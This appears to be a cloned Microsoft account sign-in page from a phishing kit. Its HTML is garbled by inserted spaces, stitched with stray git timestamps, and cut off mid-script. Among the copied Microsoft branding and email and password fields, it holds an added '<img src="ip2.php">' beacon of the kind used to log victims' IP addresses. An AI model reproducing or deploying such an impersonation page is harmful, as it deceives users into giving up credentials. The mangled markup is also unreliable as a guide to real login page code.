2019-08-30 23:28:12 +08:00
< html dir = " ltr " lang = " EN-US " >< head >< meta http - equiv = " Content-Type " content = " text/html; charset=utf-8 " >< meta http - equiv = " X-UA-Compatible " content = " IE=Edge " >< script type = " text/javascript " > var PROOF = {}; PROOF . Type = { SQSA : 6 , CSS : 5 , DeviceId : 4 , Email : 1 , AltEmail : 2 , SMS : 3 , HIP : 8 , Birthday : 9 , TOTPAuthenticator : 10 , RecoveryCode : 11 , StrongTicket : 13 , TOTPAuthenticatorV2 : 14 , UniversalSecondFactor : 15 , Voice : - 3 }; </ script >< noscript >< meta http - equiv = " Refresh " content = " 0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=e52f753aa5184927ab11e578045c61f0 " /> Microsoft account requires JavaScript to sign in . This web browser either does not support JavaScript , or scripts are being blocked .< br />< br /> To find out whether your browser supports JavaScript , or to allow scripts , see the browser 's online help.</noscript><title>Sign in to your Microsoft account</title><meta name="robots" content="none"><meta name="PageID" content="i5030"><meta name="SiteID" content="38936"><meta name="ReqLC" content="1033"><meta name="LocLC" content="1033"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"><script type="text/javascript">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var o=t[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,r),o.loaded=!0,o.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){!function(){function e(){return s.$Config||s.ServerData||{}}function r(e,r){var t=s.$Debug;t&&t.appendLog&&(r&&(e+=" ' " +(r.src||r.href|| " " )+ " '",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(e){var r=e.indexOf("?"),t=r>-1?r:e.length;return t>u&&e.substr(t-u,u).toLowerCase()===c}function n(){var r=e(),t=r.loader||{};return t.slReportFailure||r.slReportFailure||!1}function o(){var r=e(),t=r.loader||{};return t.redirectToErrorPageOnLoadFailure||!1}function a(e){var r=!0,n=e.src||e.href||"";if(n){if(t(n))try{e.sheet&&e.sheet.cssRules&&!e.sheet.cssRules.length&&(r=!1)}catch(o){}}else r=!1;return r}function i(){function n(e){var r=d.getElementsByTagName("head")[0];r.appendChild(e)}function o(e,r,n){var o=t(e)?i(e):s(e);return r&&(o.id=r),o.setAttribute&&(o.setAttribute("crossorigin","anonymous"),n&&o.setAttribute("integrity",n)),o}function i(e){var r=d.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function s(e){var r=d.createElement("script");return r.type="text/javascript",r.src=e,r.defer=!1,r.async=!1,r}function c(e){if(!(p&&p.length>1))return e;for(var r=0;r<p.length;r++)if(0===e.indexOf(p[r]))return p[r+1<p.length?r+1:0]+e.substring(p[r].length);return e}function u(e,t,n,o){return r("[$Loader]: "+(y.failMessage||"Failed"),o),L[e].retry<g?(L[e].retry++,void f(e,t,n)):void(n&&n())}function l(e,t,n,o){a(o)?(r("[$Loader]: "+(y.successMessage||"Loaded"),o),f(e+1,t,n)):u(e,t,n,o)}function f(e,t,a){if(e<L.length){var i=L[e];if(!i||!i.srcPath)return void f(e+1,t,a);i.retry>0&&(i.srcPath=c(i.srcPath),i.origId||(i.origId=i.id),i.id=i.origId+"_Retry_"+i.retry);var s=o(i.srcPath,i.id,i.integrity);s.onload=function(){l(e,t,a,s)},s.onerror=function(){u(e,t,a,s)},s.onreadystatechange=function(){"loaded"===s.readyState?setTimeout(function(){l(e,t,a,s)},500):"complete"===s.readyState&&l(e,t,a,s)},n(s),r("[$Loader]: Loading ' " +(i.srcPath|| " " )+ " ' , id : " +(i.id|| " " ))}else t&&t()}var h=e(),g=h.slMaxRetry||2,v=h.loader|| { },p=v.cdnRoots||[],y=this,L=[];y.retryOnError=!0,y.successMessage= " Loaded " ,y.failMessage= " Error " ,y.Add=function(e,r,t,n) { e&&L.push( { srcPath:e,id:r,retry:n||0,integrity:t})},y.AddForReload=function(e) { var r=e.src||e.href|| " " ;y.Add(r, " AddForReload " ,e.integrity,1)},y.AddIf=function(e,r,t) { e&&y.Add(r,t)},y.Load=function(e,r) { f(0,e,r)}}var s=window,d=s.document,c= " . css " ,u=c.length;i.On=function(e,r) { if(!e)throw " The target element must be provided and cannot be null . " ;r?i.OnError(e):i.OnSuccess(e)},i.OnSuccess=function(e) { var t=e.src||e.href|| " " ,s=n(),d=o();if(!e)throw " The target element must be
params : {
serverData : svr ,
showButtons : svr . f ,
showFooterLinks : true ,
useWizardBehavior : svr . au ,
handleWizardButtons : false ,
password : password ,
hideFromAria : ariaHidden },
event : {
footerAgreementClick : footer_agreementClick } } " ><!-- ko template: { nodes: $componentTemplateNodes , data: $parent } --><!-- ko if: svr.aL --><!-- /ko --> <div class= " middle " data-bind= " css : { 'app' : backgroundLogoUrl } " ><!-- ko if: backgroundLogoUrl() && !(paginationControlMethods() && paginationControlMethods().currentViewHasMetadata('hideLogo')) --><!-- /ko --> <div class= " inner fade - in - lightbox " data-bind= "
animationEnd : paginationControlMethods () & amp ; & amp ; paginationControlMethods () . view_onAnimationEnd ,
css : {
'app' : backgroundLogoUrl ,
'wide' : paginationControlMethods () & amp ; & amp ; paginationControlMethods () . currentViewHasMetadata ( 'wide' ),
'fade-in-lightbox' : fadeInLightBox ,
'has-popup' : showFedCredButton ,
'transparent-lightbox' : backgroundControlMethods () & amp ; & amp ; backgroundControlMethods () . useTransparentLightBox } " > <div class= " lightbox - cover " data-bind= " css : { 'disable-lightbox' : svr . BX & amp ; & amp ; showLightboxProgress () } " ></div><!-- ko if: showLightboxProgress --><!-- /ko --><!-- ko ifnot: paginationControlMethods() && (paginationControlMethods().currentViewHasMetadata('hideLogo')) --> <div data-bind= " component : { name : 'logo-control' ,
params : {
isChinaDc : svr . fIsChinaDc ,
bannerLogoUrl : bannerLogoUrl () } } " ><!-- --><!-- ko if: bannerLogoUrl --><!-- /ko --><!-- ko if: !bannerLogoUrl && !isChinaDc --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class= " logo " pngsrc= " https :// logincdn . msauth . net / 16.000 . 28230.00 / images / microsoft_logo . png ? x = ed9c9eb0dce17d752bedea6b5acda6d9 " svgsrc= " https :// logincdn . msauth . net / 16.000 . 28230.00 / images / microsoft_logo . svg ? x = ee5c8d9fb6248c938fd0dc19370e90bd " data-bind= " imgSrc , attr : { alt : str [ 'MOBILE_STR_Footer_Microsoft' ] } " src= " https :// logincdn . msauth . net / 16.000 . 28230.00 / images / microsoft_logo . svg ? x = ee5c8d9fb6248c938fd0dc19370e90bd " alt= " Microsoft " ><!-- /ko --> <!-- /ko --><!-- /ko --> <!-- /ko --></div><!-- /ko --><!-- ko if: svr.Cr && (paginationControlMethods() && !paginationControlMethods().currentViewHasMetadata('hideLwaDisclaimer')) --><!-- /ko --><!-- ko if: asyncInitReady --> <div role= " main " data-bind= " component : { name : 'pagination-control' ,
publicMethods : paginationControlMethods ,
params : {
enableCssAnimation : svr . A3 ,
initialViewId : initialViewId ,
currentViewId : currentViewId ,
initialSharedData : initialSharedData ,
initialError : $loginPage . getServerError () },
event : {
cancel : paginationControl_onCancel ,
showView : $loginPage . view_onShow ,
setLightBoxFadeIn : view_onSetLightBoxFadeIn ,
animationStateChange : paginationControl_onAnimationStateChange } } " ><!-- --> <div data-bind= " css : { 'zero-opacity' : hidePaginatedView () } " class= " " ><!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.g) --><!-- /ko --> <div class= " pagination - view animate slide - in - next " data-bind= " css : {
'has-identity-banner' : showIdentityBanner () & amp ; & amp ; ( sharedData . displayName || svr . g ),
'zero-opacity' : hidePaginatedView . hideSubView (),
'animate' : animate (),
'slide-out-next' : animate . isSlideOutNext (),
'slide-in-next' : animate . isSlideInNext (),
'slide-out-back' : animate . isSlideOutBack (),
'slide-in-back' : animate . isSlideInBack () } " ><!-- ko foreach: views --><!-- ko if: $parent .currentViewIndex() === $index () --> <!-- ko template: { nodes: [ $data ], data: $parent } --><div data-viewid= " 1 " data-showfedcredbutton= " true " data-bind= " pageViewComponent : { name : 'login-paginated-username-view' ,
params : {
serverData : svr ,
serverError : initialError ,
isInitialView : isInitialState ,
displayName : sharedData . displayName ,
prefillNames : $loginPage . prefillNames ,
flowToken : sharedData . flowToken },
event : {
refresh : $loginPage . view_onRefresh ,
redirect : $loginPage . view_onRedirect ,
setPendingRequest : $loginPage . view_onSetPendingRequest ,
showLearnMore : $loginPage . learnMore_onShow ,
registerDialog : $loginPage . view_onRegisterDialog ,
unregisterDialog : $loginPage . view_onUnregisterDialog ,
showDialog : $loginPage . view_onShowDialog } } " ><!-- --> <div data-bind= " component : { name : 'header-control' ,
params : {
serverData : svr ,
title : str [ 'WF_STR_HeaderDefault_Title' ] } } " ><div class= " row text - title " id= " loginHeader " > <div role= " heading " aria-level= " 1 " data-bind= " text : title " >Sign in</div><!-- ko if: isSubtitleVisible --><!-- /ko --> </div></div><!-- ko if: pageDescription && !svr.ba --><!-- /ko --> <div class= " row " > <div role= " alert " aria-live= " assertive " ><!-- ko if: usernameTextbox.error --><!-- /ko --> </div> <div class= " form - group col - md - 24 " ><!-- ko if: prefillNames().length > 1 --><!-- /ko --><!-- ko ifnot: prefillNames().length > 1 --> <div class= " placeholderContainer " data-bind= " component : { name : 'placeholder-textbox-field' ,
publicMethods : usernameTextbox . placeholderTextboxMethods ,
params : {
serverData : svr ,
hintText : tenantBranding . UserIdLabel || str [ 'CT_PWD_STR_Email_Example' ],
hintCss : 'placeholder' + ( ! svr . Az ? ' ltr_override' : '' ) },
event : {
updateFocus : usernameTextbox . textbox_onUpdateFocus } } " ><!-- ko withProperties: { ' $placeholderText ': placeholderText } --> <!-- ko template: { nodes: $componentTemplateNodes , data: $parent } --> <input type= " email " name= " Email " id= " i0116 " maxlength= " 113 " lang= " en " class= " form - control ltr_override " aria-required= " true " data-bind= "
css : { 'has-error' : usernameTextbox . error },
ariaLabel : tenantBranding . UserIdLabel || str [ 'CT_PWD_STR_Username_AriaLabel' ],
ariaDescribedBy : 'loginHeader loginDescription' ,
textInput : usernameTextbox . value ,
hasFocusEx : usernameTextbox . focused ,
placeholder : $placeholderText " aria-label= " Enter your email , phone , or Skype . " aria-describedby= " loginHeader loginDescription " placeholder= " Email , phone , or Skype " autofocus> <input name= " passwd " type= " password " id= " i0118 " autocomplete= " off " data-bind= " moveOffScreen , textInput : passwordBrowserPrefill " class= " moveOffScreen " tabindex= " - 1 " aria-hidden= " true " > <!-- /ko --><!-- /ko --><!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div><!-- /ko --> </div> </div> <div data-bind= " css : { 'position-buttons' : ! tenantBranding . BoilerPlateText } " class= " position - buttons " > <div class= " row " > <div class= " col - md - 24 " > <div class= " text - 13 action - links " ><!-- ko if: svr.A1 && !svr.v && !svr.AG --> <div class= " form - group " data-bind= "
htmlWithBindings : html [ 'WF_STR_SignUpLink_Text' ],
childBindings : {
'signup' : {
href : svr . H ,
ariaLabel : str [ 'WF_STR_SignupLink_AriaLabel_Text' ],
attr : { name : 'createAccount' },
click : signup_onClick } } " >No account? <a href= " https :// signup . live . com / signup ? contextid = 6568703 AD42C7BD2 & amp ; bk = 1560565059 & amp ; ru = https :// login . live . com / login . srf % 3 fcontextid % 3 d6568703AD42C7BD2 % 26 mkt % 3 dEN - US % 26 lc % 3 d1033 % 26 bk % 3 d1560565059 % 26 uaid % 3 de52f753aa5184927ab11e578045c61f0 & amp ; uiflavor = web & amp ; mkt = EN - US & amp ; lc = 1033 & amp ; uaid = e52f753aa5184927ab11e578045c61f0 " id= " signup " aria-label= " Create a Microsoft account " name= " createAccount " >Create one!</a></div><!-- /ko --><!-- ko if: svr.showCantAccessAccountLink --><!-- /ko --><!-- ko if: showFidoLinkInline && hasFido() && (availableCredsWithoutUsername().length >= 2 || svr.aM) --><!-- /ko --><!-- ko if: availableCredsWithoutUsername().length > 0 || svr.aM --> <div class= " form - group " data-bind= "
component : { name : 'cred-switch-link-control' ,
params : {
serverData : svr ,
availableCreds : availableCredsWithoutUsername (),
showForgotUsername : svr . aM },
event : {
switchView : noUsernameCredSwitchLink_onSwitchView ,
registerDialog : onRegisterDialog ,
unregisterDialog : onUnregisterDialog ,
showDialog : onShowDialog } } " ><!-- --> <div class= " form - group " ><!-- ko if: credentialCount > 1 || (credentialCount === 1 && (showForgotUsername || selectedCredShownOnlyOnPicker)) --> <a id= " idA_PWD_SwitchToCredPicker " href= " https :// login . live . com / pp1600 / #" data-bind="
text : isUserKnown ? str [ 'CT_PWD_STR_SwitchToCredPicker_Link' ] : str [ 'CT_PWD_STR_SwitchToCredPicker_Link_NoUser' ],
click : switchToCredPicker_onClick " >Sign-in options</a><!-- /ko --><!-- ko if: credentialCount === 1 && !(showForgotUsername || selectedCredShownOnlyOnPicker) --><!-- /ko --><!-- ko if: credentialCount === 0 && showForgotUsername --><!-- /ko --> </div><!-- ko if: credLinkError --><!-- /ko --></div><!-- /ko --> </div> </div> </div> <div class= " row " data-bind= " css : { 'move-buttons' : tenantBranding . BoilerPlateText } " > <div data-bind= " component : { name : 'footer-buttons-field' ,
params : {
serverData : svr ,
isPrimaryButtonEnabled : ! isRequestPending (),
isPrimaryButtonVisible : svr . f ,
isSecondaryButtonEnabled : true ,
isSecondaryButtonVisible : svr . f & amp ; & amp ; isBackButtonVisible () },
event : {
primaryButtonClick : primaryButton_onClick ,
secondaryButtonClick : secondaryButton_onClick } } " ><div class= " col - xs - 24 no - padding - left - right button - container " data-bind= "
visible : isPrimaryButtonVisible () || isSecondaryButtonVisible (),
css : { 'no-margin-bottom' : removeBottomMargin } " ><!-- ko if: isSecondaryButtonVisible --><!-- /ko --> <div class= " inline - block " ><!-- type= " submit " is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 --> <input type= " submit " id= " idSIButton9 " class= " btn btn - block btn - primary " data-bind= "
attr : primaryButtonAttributes ,
value : primaryButtonText () || str [ 'CT_PWD_STR_SignIn_Button_Next' ],
hasFocus : focusOnPrimaryButton ,
click : primaryButton_onClick ,
enable : isPrimaryButtonEnabled ,
visible : isPrimaryButtonVisible ,
preventTabbing : primaryButtonPreventTabbing " value= " Next " > </div> </div></div> </div> </div><!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko --></div><!-- /ko --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- ko if: $parent .currentViewIndex() === $index () --><!-- /ko --><!-- /ko --> </div> </div></div><!-- /ko --> </div><!-- ko if: showFedCredButton --><!-- /ko --><!-- ko if: newSession --><!-- /ko --> <input type= " hidden " name= " ps " data-bind= " value : postedLoginStateViewId " value= " " > <input type= " hidden " name= " psRNGCDefaultType " data-bind= " value : postedLoginStateViewRNGCDefaultType " value= " " > <input type= " hidden " name= " psRNGCEntropy " data-bind= " value : postedLoginStateViewRNGCEntropy " value= " " > <input type= " hidden " name= " psRNGCSLK " data-bind= " value : postedLoginStateViewRNGCSLK " value= " " > <input type= " hidden " name= " canary " data-bind= " value : svr . canary " value= " " > <input type= " hidden " name= " ctx " data-bind= " value : ctx " value= " " > <input type= " hidden " name= " hpgrequestid " data-bind= " value : svr . sessionId " value= " " > <input type= " hidden " id= " i0327 " data-bind= " attr : { name : svr . CL }, value : flowToken " name= " PPFT " value= " DcdEdJaHB ! R1wYVBzDEj ! SK ! 1 gdRziXv0q4A4OKtStH8DOvDdEkfgNCpunOAsRkpAsNR9FmFayvNxxCoS873UGIK ! GCkpS * FnmVeyr1Je6ytW * jedfciXEQoJyl6qpYYgShx1oO7WR33YBqXFa7jmpF * nhQoNQUBSpHbiInbdTUmh ! SEChv50D4a14gCHFOOrz02JnZAZa0yroPfrebc9nsFXJLZ4vMstBCU7IIKO ! x9MhosB ! iM ! fuSl7uJ39uWsA $ $ " > <input type= " hidden " name= " PPSX " data-bind= " value : svr . Co " value= " Passp " > <input type= " hidden " name= " NewUser " value= " 1 " > <input type= " hidden " name= " FoundMSAs " data-bind= " value : svr . AA " value= " " > <input type= " hidden " name= " fspost " data-bind= " value : svr . fPOST_ForceSignin ? 1 : 0 " value= " 0 " > <input type= " hidden " name= " i21 " data-bind= " value : wasLearnMoreShown () ? 1 : 0 " value= " 0 " > <input type= " hidden " name= " CookieDisclosure " data-bind= " value : svr . aL ? 1 : 0 " value= " 0 " > <input type= " hidden " name= " IsFidoSupported " data-bind= " value : isFidoSupported () ? 1 : 0 " value= " 0 " > <div data-bind= " component : { name : 'instrumentation-control' ,
publicMethods : instrumentationMethods ,
params : { serverData : svr } } " ><input type= " hidden " name= " i2 " data-bind= " value : clientMode " value= " 1 " > <input type= " hidden " name= " i17 " data-bind= " value : srsFailed " value= " 0 " > <input type= " hidden " name= " i18 " data-bind= " value : srsSuccess " > <input type= " hidden " name= " i19 " data-bind= " value : timeOnPage " value= " " ></div> <div id= " footer " class= " footer default " role= " contentinfo " data-bind= " css : { 'default' : ! backgroundLogoUrl () } " > <div data-bind= " component : { name : 'footer-control' ,
params : {
serverData : svr ,
debugDetails : debugDetails ,
showLinks : true },
event : {
agreementClick : footer_agreementClick } } " ><!-- --><!-- ko if: showLinks || impressumLink || showIcpLicense --> <div id= " footerLinks " class= " footerNode text - secondary " ><!-- ko if: !showIcpLicense --> <span id= " ftrCopy " data-bind= " html : svr . Cq " >©2019 Microsoft</span><!-- /ko --> <a id= " ftrTerms " data-bind= " text : str [ 'MOBILE_STR_Footer_Terms' ], href : termsLink , click : termsLink_onClick " href= " https :// login . live . com / gls . srf ? urlID = WinLiveTermsOfUse & amp ; mkt = EN - US & amp ; vv = 1600 & amp ; uaid = e52f753aa5184927ab11e578045c61f0 " >Terms of use</a> <a id= " ftrPrivacy " data-bind= " text : str [ 'MOBILE_STR_Footer_Privacy' ], href : privacyLink , click : privacyLink_onClick " href= " https :// login . live . com / gls . srf ? urlID = MSNPrivacyStatement & amp ; mkt = EN - US & amp ; vv = 1600 & amp ; uaid = e52f753aa5184927ab11e578045c61f0 " >Privacy & cookies</a><!-- ko if: impressumLink --><!-- /ko --><!-- ko if: showIcpLicense --><!-- /ko --><!-- Set attr binding before hasFocus to prevent Narrator from losing focus --> <a href= " #" role="button" class="moreOptions" data-bind="
click : moreInfo_onClick ,
ariaLabel : str [ 'CT_STR_More_Options_Ellipsis_AriaLabel' ],
attr : { 'aria-expanded' : showDebugDetails () . toString (),
hasFocus : focusMoreInfo () } " aria-label= " Click here for troubleshooting information " aria-expanded= " false " ><!-- ko component: { name: 'accessible-image-control', params: { hasDarkBackground: true } } --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --> <!-- ko template: { nodes: [lightImageNode], data: $parent } --><img class= " desktopMode " role= " presentation " pngsrc= " https :// logincdn . msauth . net / 16.000 . 28230.00 / images / ellipsis_white . png ? x = 0 ad43084800fd8b50a2576b5173746fe " svgsrc= " https :// logincdn . msauth . net / 16.000 . 28230.00 / images / ellipsis_white . svg ? x = 5 ac590ee72bfe06a7cecfd75b588ad73 " data-bind= " imgSrc " src= " https :// logincdn . msauth . net / 16.000 . 28230.00 / images / ellipsis_white . svg ? x = 5 ac590ee72bfe06a7cecfd75b588ad73 " ><!-- /ko --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --><!-- /ko --><!-- /ko --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img src= " ip2 . php " > <img class= " mobileMode " role= " presentation " pngsrc= " https :// logincdn . msauth . net / 16.000 . 28230.00 / images / ellipsis_grey . png ? x = 5 bc252567ef56db648207d9c36a9d004 " svgsrc= " https :// logincdn . msauth . net / 16.000 . 28230.00 / images / ellipsis_grey . svg ? x = 2 b5d393db04a5e6e1f739cb266e65b4c " data-bind= " imgSrc " src= " https :// logincdn . msauth . net / 16.000 . 28230.00 / images / ellipsis_grey . svg ? x = 2 b5d393db04a5e6e1f739cb266e65b4c " ><!-- /ko --> <!-- /ko --><!-- /ko --> </a> </div><!-- ko if: showDebugDetails --><!-- /ko --> <!-- /ko --></div> </div> </div> <!-- /ko --></div><!-- /ko --> </form> <form method= " post " aria-hidden= " true " target= " _top " data-bind= " autoSubmit : postRedirectForceSubmit , attr : { action : postRedirectUrl } " ><!-- ko foreach: postRedirectParams --><!-- /ko --> </form><!-- ko if: svr.Bq --> <div data-bind= " component : { name : 'fetch-sessions-control' ,
params : {
serverData : svr },
event : {
updateUserTiles : fetchSessions_onUpdateUserTiles ,
executeGctResult : fetchSessions_onExecuteGctResult ,
incrementAsyncTileRequestCount : fetchSessions_onIncrementAsyncTileRequestCount ,
2019-06-15 13:56:50 +08:00
decrementAsyncTileRequestCount : fetchSessions_onDecrementAsyncTileRequestCount } } " ><!-- ko if: callMsaStaticMeControl --> <div data-bind= " injectIframe : { url : svr . Bq , onload : iFrame_onload } " ><iframe height= " 0 " width= " 0 " src= " https :// login . live . com / Me . htm ? v = 1 & amp ; uaid = e52f753aa5184927ab11e578045c61f0 " style= " display : none ; " ></iframe></div> <!-- /ko --></div><!-- /ko --><!-- ko if: svr.AR --><!-- /ko --></div></body></html>